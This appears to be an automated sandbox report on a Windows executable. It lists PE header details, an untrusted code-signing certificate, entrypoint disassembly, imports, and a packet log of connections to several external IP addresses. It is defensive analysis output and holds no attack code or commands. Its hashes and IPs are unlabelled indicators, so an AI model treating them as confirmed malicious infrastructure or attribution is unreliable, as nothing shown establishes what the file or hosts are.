                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z}X.Z}X.Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}X.".X.Z}X.Z|X$Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}XRich.Z}X........................PE..L......`...

                                                                                                                          File Icon

                                                                                                                          Icon Hash:aedaae9ecea62aa2

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x8182e0
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                          Time Stamp:0x6000B185 [Thu Jan 14 21:03:01 2021 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:5bf1109d17f31fdf1287dd3cc8a8bd45

                                                                                                                          Authenticode Signature

                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:PostalCode=10305
                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                          Error Number:-2146762487
                                                                                                                          Not Before, Not After
                                                                                                                          • 11/10/2021 3:53:02 PM 11/10/2022 3:53:02 PM
                                                                                                                          Subject Chain
                                                                                                                          • PostalCode=10305
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:046EBB0A0FBFD4C2F85D5511A00C769B
                                                                                                                          Thumbprint SHA-1:0A6F3BEB4B81C6E4791C511DE34E6484277B1D99
                                                                                                                          Thumbprint SHA-256:D8B14DB5B868297FF5FBB14E701E1A2674EBD36F51FA5751C34DBF9A74D14A8A
                                                                                                                          Serial:43071B451406BB75C591CD4F54C74219

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          call 00007F5E6880913Bh
                                                                                                                          call 00007F5E68805156h
                                                                                                                          pop ebp
                                                                                                                          ret
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push FFFFFFFEh
                                                                                                                          push 008377B0h
                                                                                                                          push 0081A7F0h
                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                          push eax
                                                                                                                          add esp, FFFFFF98h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          mov eax, dword ptr [00839404h]
                                                                                                                          xor dword ptr [ebp-08h], eax
                                                                                                                          xor eax, ebp
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-10h]
                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                          mov dword ptr [ebp-70h], 00000000h
                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [00401088h]
                                                                                                                          cmp dword ptr [02F2E868h], 00000000h
                                                                                                                          jne 00007F5E68805150h
                                                                                                                          push 00000000h
                                                                                                                          push 00000000h
                                                                                                                          push 00000001h
                                                                                                                          push 00000000h
                                                                                                                          call dword ptr [00401104h]
                                                                                                                          call 00007F5E688052D3h
                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                          call 00007F5E6880CB0Bh
                                                                                                                          test eax, eax
                                                                                                                          jne 00007F5E6880514Ch
                                                                                                                          push 0000001Ch
                                                                                                                          call 00007F5E68805290h
                                                                                                                          add esp, 04h
                                                                                                                          call 00007F5E6880C468h
                                                                                                                          test eax, eax
                                                                                                                          jne 00007F5E6880514Ch
                                                                                                                          push 00000010h
                                                                                                                          call 00007F5E6880527Dh
                                                                                                                          add esp, 04h
                                                                                                                          push 00000001h
                                                                                                                          call 00007F5E6880C3B3h
                                                                                                                          add esp, 04h
                                                                                                                          call 00007F5E6880A1CBh
                                                                                                                          mov dword ptr [ebp-04h], 00000000h
                                                                                                                          call 00007F5E68808B5Fh
                                                                                                                          test eax, eax

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [LNK] VS2010 build 30319
                                                                                                                          • [ASM] VS2010 build 30319
                                                                                                                          • [ C ] VS2010 build 30319
                                                                                                                          • [C++] VS2010 build 30319
                                                                                                                          • [RES] VS2010 build 30319
                                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x437ddc0x50.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b300000x40c8.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x44f2000x828.data
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b350000x1aac.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12400x1c.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x417b100x40.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1e8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x4379880x437a00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x4390000x26f686c0x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x2b300000x40c80x4200False0.719696969697data6.2674119958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x2b350000x11bc80x11c00False0.0812747579225data1.04753991658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_ICON0x2b302400x25a8dataSpanishParaguay
                                                                                                                          RT_ICON0x2b327e80x10a8dataSpanishParaguay
                                                                                                                          RT_STRING0x2b33ad00x150dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_STRING0x2b33c200x252dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_STRING0x2b33e780x24edataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_ACCELERATOR0x2b339200x88dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_ACCELERATOR0x2b338b80x68dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_GROUP_ICON0x2b338900x22dataSpanishParaguay
                                                                                                                          RT_VERSION0x2b339a80x128dataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dll_lwrite, InterlockedDecrement, SetFirmwareEnvironmentVariableA, GetNamedPipeHandleStateA, SetHandleInformation, SetConsoleScreenBufferSize, CancelWaitableTimer, SetVolumeMountPointW, FindFirstFileExW, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, ReadConsoleW, GetSystemWow64DirectoryA, QueryActCtxW, CreateActCtxW, GetSystemTimes, ActivateActCtx, GlobalAlloc, GlobalFindAtomA, LoadLibraryW, ReadConsoleInputA, SizeofResource, GetSystemWindowsDirectoryA, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, GetModuleFileNameW, GetSystemDirectoryA, SetDllDirectoryW, GetStartupInfoW, VerifyVersionInfoW, GetLastError, IsDBCSLeadByteEx, SetLastError, GetProcAddress, CreateNamedPipeA, IsValidCodePage, CopyFileA, GlobalGetAtomNameA, SearchPathA, GetPrivateProfileStringA, OpenWaitableTimerA, WritePrivateProfileStringA, WTSGetActiveConsoleSessionId, SetConsoleCursorInfo, GetProcessShutdownParameters, BuildCommDCBA, GetCurrentDirectoryA, GetFileTime, GetVersionExA, GetWindowsDirectoryW, FileTimeToLocalFileTime, TlsFree, GetProfileSectionW, CommConfigDialogW, LocalFileTimeToFileTime, CompareStringW, TlsGetValue, DeleteFileA, GetCommandLineA, HeapSetInformation, EnterCriticalSection, LeaveCriticalSection, DecodePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, IsProcessorFeaturePresent, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, InterlockedIncrement, ExitProcess, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, IsBadReadPtr, TlsAlloc, TlsSetValue, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, RaiseException, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, FlushFileBuffers, GetStringTypeW, LCMapStringW, MultiByteToWideChar, SetStdHandle, CloseHandle, CreateFileW
                                                                                                                          USER32.dllGetMessageTime
                                                                                                                          GDI32.dllGetBitmapBits

                                                                                                                          Version Infos

                                                                                                                          DescriptionData
                                                                                                                          Translations0x0522 0x023c

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          SpanishParaguay
                                                                                                                          Divehi; Dhivehi; MaldivianMaldives

                                                                                                                          Network Behavior

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 11, 2021 01:57:25.943613052 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:25.943671942 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.943871021 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:25.945086956 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:25.945138931 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.964384079 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:25.964432955 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.964845896 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:25.982342005 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:25.982398987 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.999628067 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.003365040 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.003417969 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.003964901 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.003978968 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.005194902 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.005275011 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.007180929 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.007272005 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.007390976 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.007416010 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.031532049 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.051395893 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.051424980 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.051947117 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.051958084 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.053608894 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.053714991 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.056186914 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.056385040 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.056508064 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.056524038 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.056696892 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.056740999 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.056823969 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.057049036 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.057106972 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057228088 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.057243109 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057414055 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.057426929 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057538986 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057553053 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.057574987 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057651997 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.057811975 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.057845116 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.057866096 CET49747443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:26.057879925 CET44349747104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.223285913 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.223500967 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.223634958 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.224770069 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.224818945 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:26.224838972 CET49748443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:26.224853039 CET44349748104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.804554939 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.804609060 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.804697990 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.806359053 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.806390047 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.844959974 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.845187902 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.845227957 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.845765114 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.845777988 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.848901033 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.848999977 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.850955009 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.851120949 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.851155043 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.891774893 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.892015934 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.892066002 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.892090082 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.892103910 CET49749443192.168.2.3104.21.34.203
                                                                                                                          Nov 11, 2021 01:57:29.892116070 CET44349749104.21.34.203192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.124598026 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.124660015 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.124742031 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.127474070 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.127504110 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.166868925 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.167211056 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.167254925 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.167835951 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.167854071 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.170991898 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.171071053 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.173746109 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.173870087 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.174062014 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.174091101 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.232697964 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.232809067 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.238821983 CET49750443192.168.2.3104.21.79.9
                                                                                                                          Nov 11, 2021 01:57:31.238851070 CET44349750104.21.79.9192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.430028915 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.430084944 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.430182934 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.452739000 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.452770948 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.513964891 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.559487104 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.559546947 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.698333025 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.698370934 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.701858044 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.701960087 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.701971054 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:45.772183895 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:46.041440010 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:46.041723013 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:46.041753054 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.084945917 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.107187033 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.107285023 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:46.114032984 CET49751443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:57:46.114067078 CET44349751172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.331562996 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.347842932 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.347937107 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.367980957 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.384701014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.396821022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.396887064 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.396924973 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.396956921 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.396987915 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397028923 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397070885 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397087097 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397109985 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397124052 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397150993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397191048 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397216082 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397227049 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397231102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397272110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397309065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397337914 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397347927 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397387981 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397409916 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397427082 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397468090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397476912 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397505999 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397543907 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397558928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397584915 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397622108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397638083 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397661924 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397700071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397708893 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397738934 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397778988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397789001 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397816896 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397855997 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397864103 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397900105 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397937059 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.397949934 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.397978067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398016930 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398026943 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398056984 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398097992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398106098 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398145914 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398185968 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398199081 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398225069 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398262978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398299932 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398300886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398339987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398343086 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398376942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398416996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398426056 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398453951 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398493052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398531914 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398576975 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398578882 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398587942 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398617983 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398658037 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.398665905 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.398694992 CET8049752172.67.196.11192.168.2.3
